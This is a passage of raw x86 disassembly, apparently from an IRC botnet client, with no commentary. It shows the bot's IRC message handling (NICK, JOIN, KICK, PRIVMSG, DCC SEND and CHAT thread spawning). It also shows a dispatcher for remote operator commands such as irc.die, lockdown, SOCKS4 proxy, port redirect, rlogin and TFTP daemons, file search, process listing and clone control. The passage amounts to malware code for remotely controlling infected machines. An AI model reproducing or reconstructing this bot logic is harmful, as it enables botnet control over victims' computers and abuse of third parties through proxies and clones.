mov edi, 80h
loc_40F128: ; CODE XREF: sub_40EE72+2DB�j
lea eax, [ebp+var_AA8]
push eax
push esi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F145
mov [ebp+var_AC], 1
loc_40F145: ; CODE XREF: sub_40EE72+2C7�j
add esi, edi
dec [ebp+var_BC]
jnz short loc_40F128
mov esi, [ebp+var_90]
push esi
push offset aKick ; "KICK"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_40F241
mov esi, [ebp+arg_18]
mov [ebp+arg_24], 2
loc_40F174: ; CODE XREF: sub_40EE72+392�j
cmp [esi], bl
jz loc_40F1FF
push 7Fh
lea eax, [ebp+var_AA8]
push esi
push eax
call sub_418C10
lea eax, [ebp+var_D8]
add esp, 0Ch
test eax, eax
jz short loc_40F1FF
cmp [ebp+var_88], ebx
jz short loc_40F1FF
push [ebp+var_88]
lea eax, [ebp+var_D8]
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F1FF
lea eax, [ebp+var_D8]
mov [esi], bl
push eax
lea eax, [ebp+var_2DC]
push offset dword_432E04
push eax
call sub_4172B0
add esp, 0Ch
lea eax, [ebp+var_2DC]
push eax
lea eax, [ebp+var_D8]
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push [ebp+arg_4]
call sub_40D633
lea eax, [ebp+var_2DC]
push eax
call sub_40BF6D
add esp, 14h
loc_40F1FF: ; CODE XREF: sub_40EE72+304�j
; sub_40EE72+324�j ...
add esi, edi
dec [ebp+arg_24]
jnz loc_40F174
push [ebp+var_88]
push [ebp+arg_10]
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F239
push [ebp+arg_C]
mov eax, [ebp+arg_20]
push [ebp+arg_8]
mov [eax], ebx
push offset aJoinSS ; "JOIN %s %s\r\n"
loc_40F22E: ; CODE XREF: sub_40EE72+618�j
; sub_40EE72+978�j
push [ebp+arg_4]
call sub_40D633
loc_40F236: ; CODE XREF: sub_40EE72+57D8�j
; sub_40EE72+57F5�j ...
add esp, 10h
loc_40F239: ; CODE XREF: sub_40EE72+5B�j
; sub_40EE72+F1�j ...
push 1
loc_40F23B: ; CODE XREF: sub_40EE72+5CEB�j
pop eax
loc_40F23C: ; CODE XREF: sub_40EE72+29F�j
; sub_40EE72+229D�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40F241: ; CODE XREF: sub_40EE72+2F2�j
push esi
push offset aNick ; "NICK"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_40F397
mov eax, [ebp+var_8C]
mov esi, [ebp+arg_18]
inc eax
mov [ebp+arg_0], 2
mov [ebp+arg_24], eax
loc_40F26A: ; CODE XREF: sub_40EE72+44A�j
lea eax, [ebp+var_AA8]
push eax
push esi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F2B7
lea eax, [ebp+var_AA8]
push 21h
push eax
call sub_418F50
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_1C], eax
jz short loc_40F2B7
push [ebp+arg_24]
lea edi, [esi+2]
mov byte ptr [esi], 3Ah
lea eax, [edi-1]
push eax
call sub_4179C0
push [ebp+arg_1C]
push edi
call sub_4179D0
add esp, 10h
mov edi, 80h
loc_40F2B7: ; CODE XREF: sub_40EE72+409�j
; sub_40EE72+420�j
add esi, edi
dec [ebp+arg_0]
jnz short loc_40F26A
lea eax, [ebp+var_D8]
test eax, eax
jz loc_40F239
cmp [ebp+arg_24], ebx
jz loc_40F239
push [ebp+arg_10]
lea eax, [ebp+var_D8]
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F2FF
push 0Fh
push [ebp+arg_24]
push [ebp+arg_10]
call sub_418C10
add esp, 0Ch
jmp loc_40F239
; ---------------------------------------------------------------------------
loc_40F2FF: ; CODE XREF: sub_40EE72+476�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_40F304: ; CODE XREF: sub_40EE72+4B3�j
cmp [edi], bl
jz short loc_40F31B
lea eax, [ebp+var_AA8]
push eax
push edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_40F32C
loc_40F31B: ; CODE XREF: sub_40EE72+494�j
inc esi
add edi, 80h
cmp esi, 2
jl short loc_40F304
jmp loc_40F239
; ---------------------------------------------------------------------------
loc_40F32C: ; CODE XREF: sub_40EE72+4A7�j
lea eax, [ebp+var_AA8]
push 21h
push eax
call sub_418F50
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_0], eax
jz loc_40F239
push eax
call sub_417AB0
push [ebp+arg_24]
mov edi, eax
call sub_417AB0
add edi, eax
pop ecx
cmp edi, 7Eh
pop ecx
ja loc_40F239
push [ebp+arg_0]
shl esi, 7
push [ebp+arg_24]
add esi, [ebp+arg_18]
push offset aSS_1 ; ":%s%s"
push esi
call sub_4172B0
push ebx
lea eax, [ebp+var_4C0]
push ebx
push eax
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40D679
add esp, 24h
jmp loc_40F239
; ---------------------------------------------------------------------------
loc_40F397: ; CODE XREF: sub_40EE72+3DE�j
push esi
push offset aPart ; "PART"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_40F3B9
push esi
push offset aQuit ; "QUIT"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F3E0
loc_40F3B9: ; CODE XREF: sub_40EE72+534�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_40F3BE: ; CODE XREF: sub_40EE72+56C�j
cmp [edi], bl
jz short loc_40F3D4
push [ebp+var_94]
push edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_40F42E
loc_40F3D4: ; CODE XREF: sub_40EE72+54E�j
inc esi
add edi, 80h
cmp esi, 2
jl short loc_40F3BE
loc_40F3E0: ; CODE XREF: sub_40EE72+545�j
push [ebp+var_90]
push offset a353 ; "353"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_40F48F
push [ebp+var_84]
push [ebp+arg_8]
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F417
mov eax, [ebp+arg_20]
mov dword ptr [eax], 1
loc_40F417: ; CODE XREF: sub_40EE72+59A�j
push [ebp+var_84]
push offset dword_432DA8
loc_40F422: ; CODE XREF: sub_40EE72+5B47�j
; sub_40EE72+5E96�j ...
call sub_40BFE1
pop ecx
loc_40F428: ; CODE XREF: sub_40EE72+5FAB�j
pop ecx
jmp loc_40F239
; ---------------------------------------------------------------------------
loc_40F42E: ; CODE XREF: sub_40EE72+560�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_D8]
push eax
lea eax, [ebp+var_2DC]
push offset dword_432D78
push eax
call sub_4172B0
lea eax, [ebp+var_2DC]
push eax
call sub_40BF6D
push [ebp+var_90]
push offset aPart ; "PART"
call sub_4176D0
add esp, 18h
test eax, eax
jnz loc_40F239
lea eax, [ebp+var_2DC]
push eax
mov eax, [ebp+var_94]
inc eax
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
jmp loc_40F22E
; ---------------------------------------------------------------------------
loc_40F48F: ; CODE XREF: sub_40EE72+582�j
push [ebp+var_90]
mov esi, offset aPrivmsg ; "PRIVMSG"
push esi
call sub_4176D0
pop ecx
mov edi, offset aNotice ; "NOTICE"
test eax, eax
pop ecx
jz short loc_40F4E3
push [ebp+var_90]
push edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_40F4E3
push [ebp+var_90]
push offset dword_432D74
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_414F47
cmp ds:dword_42F5B8, ebx
jz loc_414F47
loc_40F4E3: ; CODE XREF: sub_40EE72+637�j
; sub_40EE72+649�j
push [ebp+var_90]
push esi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_40F66F
push [ebp+var_90]
push edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_40F66F
mov eax, [ebp+var_88]
inc [ebp+var_84]
push 4
mov [ebp+var_8C], eax
pop esi
mov [ebp+var_C0], esi
loc_40F52A: ; CODE XREF: sub_40EE72+8B9�j
; sub_40EE72+94D�j ...
shl esi, 2
mov eax, [ebp+esi+var_94]
lea edi, [ebp+esi+var_94]
push eax
push offset dword_432D6C
mov [ebp+arg_8], eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_40F96F
push [ebp+esi+var_90]
push offset aSend_0 ; "SEND"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_40F82A
cmp [ebp+var_AC], ebx
jz loc_40F800
push [ebp+esi+var_8C]
mov edi, offset aS_3 ; "%s"
lea eax, [ebp+var_6F4]
push edi
push eax
call sub_4172B0
add esp, 0Ch
lea eax, [ebp+var_708]
push [ebp+esi+var_88]
push edi
push eax
call sub_4172B0
push [ebp+esi+var_84]
call sub_41781F
mov [ebp+var_570], eax
mov eax, [ebp+arg_4]
mov [ebp+var_710], eax
lea eax, [ebp+var_D8]
push 7Fh
push eax
lea eax, [ebp+var_5F0]
push eax
call sub_418C10
mov eax, [ebp+var_4]
add esp, 1Ch
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_5F0]
push eax
lea eax, [ebp+var_6F4]
push eax
lea eax, [ebp+var_2DC]
push offset dword_432D28
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push 12h
push eax
call sub_416D5C
add esp, 1Ch
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_710]
push ebx
push eax
push offset sub_40C8B4
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz loc_40F7EF
loc_40F659: ; CODE XREF: sub_40EE72+7FB�j
cmp [ebp+var_560], ebx
jnz loc_40F822
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_40F659
; ---------------------------------------------------------------------------
loc_40F66F: ; CODE XREF: sub_40EE72+681�j
; sub_40EE72+697�j
push [ebp+var_90]
push edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F688
mov [ebp+var_4], 1
loc_40F688: ; CODE XREF: sub_40EE72+80D�j
cmp [ebp+var_8C], ebx
jz loc_40F239
push (offset loc_4289A7+1)
push [ebp+var_8C]
call sub_417880
pop ecx
test eax, eax
pop ecx
jz short loc_40F6AF
cmp [ebp+var_4], ebx
jz short loc_40F6BB
loc_40F6AF: ; CODE XREF: sub_40EE72+836�j
lea eax, [ebp+var_D8]
mov [ebp+var_8C], eax
loc_40F6BB: ; CODE XREF: sub_40EE72+83B�j
cmp [ebp+var_88], ebx
jz loc_40F239
inc [ebp+var_88]
jz short loc_40F707
cmp [ebp+arg_10], ebx
jz short loc_40F707
lea eax, [ebp+var_928]
push eax
call sub_417AB0
push eax
lea eax, [ebp+var_928]
push [ebp+var_88]
push eax
call sub_418DA0
mov esi, eax
add esp, 10h
neg esi
sbb esi, esi
add esi, 4
mov [ebp+var_C0], esi
jmp short loc_40F70D
; ---------------------------------------------------------------------------
loc_40F707: ; CODE XREF: sub_40EE72+85B�j
; sub_40EE72+860�j
mov esi, [ebp+var_C0]
loc_40F70D: ; CODE XREF: sub_40EE72+893�j
mov edi, [ebp+esi*4+var_94]
cmp edi, ebx
jz loc_40F239
push edi
push offset dword_432D1C
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_40F52A
mov ecx, [ebp+var_8C]
cmp byte ptr [ecx], 23h
jz short loc_40F7B0
mov eax, ds:dword_4CD770
mov eax, ds:off_42F6C8[eax*4]
cmp [eax], bl
jz short loc_40F7B0
push eax
push ecx
push offset dword_432D00
push [ebp+arg_4]
call sub_40D633
add esp, 10h
lea eax, [ebp+var_D8]
push eax
lea eax, [ebp+var_2DC]
push offset aSHasJustVersio ; "%s has just versioned me."
push eax
call sub_4172B0
lea eax, [ebp+var_2DC]
push eax
call sub_40BF6D
add esp, 10h
cmp [ebp+var_AC], ebx
jnz loc_40F239
push ebx
lea eax, [ebp+var_2DC]
push 1
push eax
push offset dword_4CD67C
loc_40F7A0: ; CODE XREF: sub_40EE72+58C1�j
push [ebp+arg_4]
call sub_40D679
add esp, 14h
jmp loc_40F239
; ---------------------------------------------------------------------------
loc_40F7B0: ; CODE XREF: sub_40EE72+8C8�j
; sub_40EE72+8D8�j
push edi
push offset dword_432CDC
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_40F52A
mov eax, [ebp+esi*4+var_90]
cmp eax, ebx
jz loc_40F52A
mov ecx, [ebp+var_8C]
cmp byte ptr [ecx], 23h
jz loc_40F52A
push eax
push ecx
push offset dword_432CC4
jmp loc_40F22E
; ---------------------------------------------------------------------------
loc_40F7EF: ; CODE XREF: sub_40EE72+7E1�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset dword_432C7C
jmp loc_40F95B
; ---------------------------------------------------------------------------
loc_40F800: ; CODE XREF: sub_40EE72+702�j
lea eax, [ebp+var_D8]
push eax
push [ebp+esi+var_8C]
push offset dword_432C2C
loc_40F813: ; CODE XREF: sub_40EE72+6177�j
; sub_40EE72+61DE�j
lea eax, [ebp+var_2DC]
push eax
call sub_4172B0
add esp, 10h
loc_40F822: ; CODE XREF: sub_40EE72+7ED�j
; sub_40EE72+AB1�j ...
push 1
pop esi
jmp loc_411100
; ---------------------------------------------------------------------------
loc_40F82A: ; CODE XREF: sub_40EE72+6F6�j
push [ebp+esi+var_90]
push offset aChat ; "CHAT"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_40F985
cmp [ebp+var_AC], ebx
jz loc_40F94F
push 13h
call sub_416FA4
test eax, eax
pop ecx
jnz loc_40F941
push [ebp+esi+var_88]
lea eax, [ebp+var_708]
push offset aS_3 ; "%s"
push eax
call sub_4172B0
push [ebp+esi+var_84]
call sub_41781F
mov [ebp+var_570], eax
mov eax, [ebp+arg_4]
mov [ebp+var_710], eax
lea eax, [ebp+var_D8]
push 7Fh
push eax
lea eax, [ebp+var_5F0]
push eax
call sub_418C10
mov eax, [ebp+var_4]
add esp, 1Ch
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_D8]
push eax
lea eax, [ebp+var_2DC]
push offset dword_432BF4
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push 13h
push eax
call sub_416D5C
add esp, 18h
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_710]
push ebx
push eax
push offset sub_40C351
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_40F933
loc_40F91D: ; CODE XREF: sub_40EE72+ABF�j
cmp [ebp+var_560], ebx
jnz loc_40F822
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_40F91D
; ---------------------------------------------------------------------------
loc_40F933: ; CODE XREF: sub_40EE72+AA9�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset dword_432BB0
jmp short loc_40F95B
; ---------------------------------------------------------------------------
loc_40F941: ; CODE XREF: sub_40EE72+9E9�j
lea eax, [ebp+var_D8]
push eax
push offset dword_432B70
jmp short loc_40F95B
; ---------------------------------------------------------------------------
loc_40F94F: ; CODE XREF: sub_40EE72+9D9�j
lea eax, [ebp+var_D8]
push eax
push offset dword_432B30
loc_40F95B: ; CODE XREF: sub_40EE72+989�j
; sub_40EE72+ACD�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4172B0
add esp, 0Ch
jmp loc_40F822
; ---------------------------------------------------------------------------
loc_40F96F: ; CODE XREF: sub_40EE72+6DB�j
mov eax, [ebp+arg_8]
lea ecx, [eax+1]
mov al, [eax]
cmp al, ds:byte_42F5C4
mov [edi], ecx
jnz loc_40F239
loc_40F985: ; CODE XREF: sub_40EE72+9CD�j
mov edi, [edi]
mov [ebp+arg_8], edi
push edi
mov edi, offset aC_1 ; "c"
push edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414F4F
push [ebp+arg_8]
push edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414F4F
cmp [ebp+var_AC], ebx
jnz short loc_40F9D5
push [ebp+var_90]
push offset dword_432D74
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_414F47
loc_40F9D5: ; CODE XREF: sub_40EE72+B47�j
cmp [ebp+arg_28], ebx
jnz loc_414F47
xor edi, edi
cmp ds:dword_42F794, ebx
jle loc_40FB81
mov [ebp+arg_20], offset dword_43FA70
loc_40F9F3: ; CODE XREF: sub_40EE72+BA0�j
push [ebp+arg_8]
push [ebp+arg_20]
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_40FA19
add [ebp+arg_20], 0B8h
inc edi
cmp edi, ds:dword_42F794
jl short loc_40F9F3
jmp loc_40FB81
; ---------------------------------------------------------------------------
loc_40FA19: ; CODE XREF: sub_40EE72+B90�j
push offset asc_432E84 ; " :"
push [ebp+arg_0]
call sub_417880
pop ecx
cmp eax, ebx
pop ecx
jz loc_40F239
mov cl, ds:byte_42F5C4
imul edi, 0B8h
mov [eax+2], cl
mov cl, ds:byte_42F5C4
mov [eax+3], cl
lea ecx, dword_43FA88[edi]
push 9Fh
add eax, 4
push ecx
push eax
call sub_418C10
lea eax, [ebp+esi+var_54]
add esp, 0Ch
mov [ebp+arg_20], 0Fh
mov [ebp+arg_C], eax
loc_40FA6E: ; CODE XREF: sub_40EE72+CA4�j
push [ebp+arg_20]
lea eax, [ebp+var_B8]
push offset aD_0 ; "$%d-"
push eax
call sub_4172B0
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_417880
add esp, 14h
test eax, eax
jz short loc_40FADA
mov eax, [ebp+arg_C]
cmp [eax], ebx
jz short loc_40FADA
lea eax, dword_43FA70[edi]
push eax
call sub_417AB0
add [ebp+var_C], eax
pop ecx
jz short loc_40FB0C
mov eax, [ebp+arg_C]
push dword ptr [eax-4]
push [ebp+var_C]
call sub_417880
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40FB0C
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_40A7D7
add esp, 0Ch
jmp short loc_40FB0C
; ---------------------------------------------------------------------------
loc_40FADA: ; CODE XREF: sub_40EE72+C24�j
; sub_40EE72+C2B�j
mov eax, [ebp+arg_C]
cmp [eax], ebx
jnz short loc_40FB0C
lea eax, [ebp+var_B8]
push 2
push eax
lea eax, [ebp+var_14]
push eax
call sub_418C10
lea eax, [ebp+var_14]
mov [ebp+var_12], bl
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_40A7D7
add esp, 18h
loc_40FB0C: ; CODE XREF: sub_40EE72+C3D�j
; sub_40EE72+C51�j ...
dec [ebp+arg_20]
sub [ebp+arg_C], 4
cmp [ebp+arg_20], ebx
jg loc_40FA6E
lea eax, [ebp+esi+var_54]
mov [ebp+arg_20], 10h
mov edi, eax
loc_40FB29: ; CODE XREF: sub_40EE72+D03�j
push [ebp+arg_20]
lea eax, [ebp+var_B8]
push offset aD ; "$%d"
push eax
call sub_4172B0
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_417880
add esp, 14h
test eax, eax
jz short loc_40FB6C
mov eax, [edi]
cmp eax, ebx
jz short loc_40FB6C
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_40A7D7
add esp, 0Ch
loc_40FB6C: ; CODE XREF: sub_40EE72+CDF�j
; sub_40EE72+CE5�j
dec [ebp+arg_20]
sub edi, 4
cmp [ebp+arg_20], ebx
jg short loc_40FB29
mov [ebp+var_DC], 1
loc_40FB81: ; CODE XREF: sub_40EE72+B74�j
; sub_40EE72+BA2�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, ds:byte_42F5C4
jz short loc_40FB9A
cmp [ebp+var_DC], ebx
jz loc_40FD7F
loc_40FB9A: ; CODE XREF: sub_40EE72+D1A�j
push [ebp+arg_10]
mov edi, [ebp+arg_0]
push offset aMe_0 ; "$me"
push edi
call sub_40A7D7
lea eax, [ebp+var_D8]
push eax
push offset aUser_2 ; "$user"
push edi
call sub_40A7D7
push [ebp+var_8C]
push offset aChan ; "$chan"
push edi
call sub_40A7D7
push ebx
push ebx
lea eax, [ebp+var_B8]
push 2
push eax
call sub_415D01
push eax
push offset aRndnick ; "$rndnick"
push edi
call sub_40A7D7
add esp, 40h
push [ebp+arg_14]
push offset aServer_0 ; "$server"
push edi
call sub_40A7D7
mov edi, offset aChr ; "$chr("
push edi
push [ebp+arg_0]
call sub_417880
add esp, 14h
loc_40FC0C: ; CODE XREF: sub_40EE72+E86�j
test eax, eax
jz loc_40FCFD
push edi
push [ebp+arg_0]
call sub_417880
mov [ebp+arg_10], eax
add eax, 5
push 4
push eax
lea eax, [ebp+var_B8]
push eax
call sub_418C10
lea eax, [ebp+var_B8]
push offset asc_432AEC ; ")"
push eax
call sub_418B6E
add esp, 1Ch
cmp [ebp+var_B8], 30h
jl short loc_40FC58
cmp [ebp+var_B8], 39h
jle short loc_40FC6E
loc_40FC58: ; CODE XREF: sub_40EE72+DDB�j
push 3
lea eax, [ebp+var_B8]
push offset a63 ; "63"
push eax
call sub_418C10
add esp, 0Ch
loc_40FC6E: ; CODE XREF: sub_40EE72+DE4�j
lea eax, [ebp+var_B8]
push eax
call sub_41781F
test eax, eax
pop ecx
jle short loc_40FC91
lea eax, [ebp+var_B8]
push eax
call sub_41781F
pop ecx
mov [ebp+var_14], al
jmp short loc_40FCA2
; ---------------------------------------------------------------------------
loc_40FC91: ; CODE XREF: sub_40EE72+E0B�j
call sub_41730C
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp+var_14], dl
loc_40FCA2: ; CODE XREF: sub_40EE72+E1D�j
lea eax, [ebp+var_B8]
mov [ebp+var_13], bl
push eax
call sub_417AB0
mov [ebp+arg_20], eax
push 0Ch
lea eax, [ebp+var_B8]
push ebx
push eax
call sub_417330
mov eax, [ebp+arg_20]
add eax, 6
push eax
lea eax, [ebp+var_B8]
push [ebp+arg_10]
push eax
call sub_418C10
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_40A7D7
push edi
push [ebp+arg_0]
call sub_417880
add esp, 30h
jmp loc_40FC0C
; ---------------------------------------------------------------------------
loc_40FCFD: ; CODE XREF: sub_40EE72+D9C�j
mov edi, 1FFh
lea eax, [ebp+var_FB0]
push edi
push [ebp+arg_0]
push eax
call sub_418C10
lea eax, [ebp+var_FB0]
push edi
push eax
lea eax, [ebp+var_11B0]
push eax
call sub_418C10
lea eax, [ebp+var_11B0]
push offset asc_42A3B4 ; " "
push eax
call sub_418B6E
add esp, 20h
mov [ebp+var_94], eax
lea edi, [ebp+var_90]
mov [ebp+arg_10], 1Fh
loc_40FD4D: ; CODE XREF: sub_40EE72+EF0�j
push offset asc_42A3B4 ; " "
push ebx
call sub_418B6E
mov [edi], eax
pop ecx
add edi, 4
dec [ebp+arg_10]
pop ecx
jnz short loc_40FD4D
mov ecx, [ebp+esi+var_94]
lea eax, [ebp+esi+var_94]
cmp ecx, ebx
jz loc_40F239
add ecx, 3
mov [eax], ecx
loc_40FD7F: ; CODE XREF: sub_40EE72+D22�j
mov edi, [ebp+esi+var_94]
push edi
push offset aIrc_rndnick ; "irc.rndnick"
mov [ebp+arg_8], edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414EF5
push edi
push offset aRn ; "rn"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414EF5
push edi
push offset aIrc_die ; "irc.die"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414ED3
push edi
push offset aIrc_di ; "irc.di"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414ED3
push edi
push offset aIrc_logout ; "irc.logout"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414E31
push edi
push offset aLo ; "lo"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414E31
push edi
push offset aIrc_version ; "irc.version"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414E22
push edi
push offset aVer ; "ver"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414E22
push edi
push offset aLockdown_on ; "lockdown.on"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414D0D
push edi
push offset aLd_on ; "ld.on"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414D0D
push edi
push offset aLockdown_off ; "lockdown.off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414D0D
push edi
push offset aLd_off ; "ld.off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414D0D
push edi
push offset aProxy_socks4_o ; "proxy.socks4.on"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414BEB
push edi
push offset aProxy_s4_on ; "proxy.s4.on"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414BEB
push edi
push offset aProxy_socks4_0 ; "proxy.socks4.off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40FEEF
push [ebp+esi+var_90]
push 11h
push offset aServer ; "Server"
push offset dword_432A34
loc_40FED3: ; CODE XREF: sub_40EE72+10A1�j
; sub_40EE72+10C7�j ...
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_416FEA
add esp, 20h
jmp loc_40F239
; ---------------------------------------------------------------------------
loc_40FEEF: ; CODE XREF: sub_40EE72+104C�j
push edi
push offset aDaemon_rlogin_ ; "daemon.rlogin.off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40FF15
push [ebp+esi+var_90]
push 6
push offset aServer ; "Server"
push offset dword_432A10
jmp short loc_40FED3
; ---------------------------------------------------------------------------
loc_40FF15: ; CODE XREF: sub_40EE72+108C�j
push edi
push offset dword_432A00
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40FF3B
push [ebp+esi+var_90]
push 3
push offset aServer ; "Server"
push offset dword_4329F4
jmp short loc_40FED3
; ---------------------------------------------------------------------------
loc_40FF3B: ; CODE XREF: sub_40EE72+10B2�j
push edi
push offset dword_4329EC
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40FF64
push [ebp+esi+var_90]
push 1Dh
push offset dword_4329E0
push offset dword_4329D4
jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_40FF64: ; CODE XREF: sub_40EE72+10D8�j
push edi
push offset aProxy_redirect ; "proxy.redirect.off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40FF8D
push [ebp+esi+var_90]
push 10h
push offset dword_4329B0
push offset dword_4329A0
jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_40FF8D: ; CODE XREF: sub_40EE72+1101�j
push edi
push offset dword_432994
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40FFB6
push [ebp+esi+var_90]
push 0Ah
push offset dword_432988
push offset dword_43297C
jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_40FFB6: ; CODE XREF: sub_40EE72+112A�j
push edi
push offset dword_43296C
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40FFDF
push [ebp+esi+var_90]
push 0Bh
push offset dword_432960
push offset dword_432954
jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_40FFDF: ; CODE XREF: sub_40EE72+1153�j
push edi
push offset dword_432944
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410008
push [ebp+esi+var_90]
push 0Fh
push offset dword_432938
push offset dword_43292C
jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_410008: ; CODE XREF: sub_40EE72+117C�j
push edi
push offset dword_43291C
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410031
push [ebp+esi+var_90]
push 0Eh
push offset dword_432910
push offset dword_432904
jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_410031: ; CODE XREF: sub_40EE72+11A5�j
push edi
push offset aDaemon_tftp_of ; "daemon.tftp.off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_41005A
push [ebp+esi+var_90]
push 4
push offset aServer ; "Server"
push offset dword_4328E8
jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_41005A: ; CODE XREF: sub_40EE72+11CE�j
push edi
push offset aUtil_findfile_ ; "util.findfile.off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414BD3
push edi
push offset aUtil_ff_off ; "util.ff.off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414BD3
push edi
push offset aCom_procs_off ; "com.procs.off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414BBB
push edi
push offset aCom_ps_off ; "com.ps.off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414BBB
push edi
push offset aClone_off ; "clone.off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4100D7
push [ebp+esi+var_90]
push 18h
push offset aClone ; "Clone"
push offset dword_432888
jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_4100D7: ; CODE XREF: sub_40EE72+124B�j
push edi
push offset aLockdown_stop ; "lockdown.stop"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410100
push [ebp+esi+var_90]
push 1Ah
push offset aSecure_0 ; "Secure"
push offset dword_432860
